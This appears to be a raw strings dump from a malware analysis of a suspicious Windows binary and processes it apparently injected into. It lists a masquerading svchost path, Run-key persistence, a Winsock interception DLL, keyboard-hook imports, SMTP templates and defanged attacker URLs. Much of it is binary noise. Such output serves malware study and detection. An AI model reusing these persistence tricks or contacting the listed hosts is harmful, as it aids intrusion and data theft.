F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
RASAPI32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
GetKeyboardLayout
VkKeyScanExA
keybd_event
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
oledlg.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
X-X-X-X-X-X
X-X-X-X-X-X
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
hXXp://VVV.92117my.com/host.htmly
hXXp://VVV.92117my.com/host.htmly
C:\Windows\svchosl.exe
C:\Windows\svchosl.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
..a.OO
..a.OO
(*.*)
1.0.0.0
svchostlsp.exe_3736:
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
^}•0DN
u$SShe
kernel32.dll
user32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xff
C:\Windows\twain_32\config\ESPI11.dll
C:\Windows\twain_32\config
.inidata
@.reloc
CNotSupportedException
CCmdTarget
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
WS2_32.dll
COMCTL32.dll
GetCPInfo
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyState
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
WINSPOOL.DRV
comdlg32.dll
SHELL32.dll
SWNPM.dll
.PAVCException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
>$>(>,>0>4>8>@>
0F0g0m0
9$9(9,90989
%System%\addressoftext.inscan
hXXp://20140507.ip138.com/ic.asp
z>Windows 2000
@Windows XP
@Windows Server 2003
@Windows Vista
@Windows 7
@Windows 8
@127.0.0.1
hXXp://VVV.gxnkw.com/jc/tongji.txt
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Broken pipe
Inappropriate I/O control operation
Operation not permitted
RASAPI32.dll
GetProcessHeap
WinExec
GetViewportOrgEx
WINMM.dll
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegEnumKeyA
RegOpenKeyA
ShellExecuteA
ole32.dll
OLEAUT32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
GetViewportExtEx
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
%s\ESPI%d.dll
hXXp://dywt.com.cn
service@dywt.com.cn
86(0411)88995834
86(0411)88995831
Windows
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info
CallerInfoCopyCmd
SetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCResourceException@@
.PAVCUserException@@
zcÁ
18201869647.com:88
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe
#include "l.chs\afxres.rc" // Standard components
555455###
1, 1, 0, 0
ESPI11.dll
(*.*)
1.0.0.0
iexplore.exe_1924:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
6user32.dll
Kernel32.DLL
6xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_1548:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
6user32.dll
Kernel32.DLL
6xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
SearchFilterHost.exe_3408:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
0xx%p%S%d
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
0xx=
%S(%d)
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
SearchProtocolHost.exe_1908:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
0xx=
%s(%d)
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
0xx%p%S%d
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
%S(%d)
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610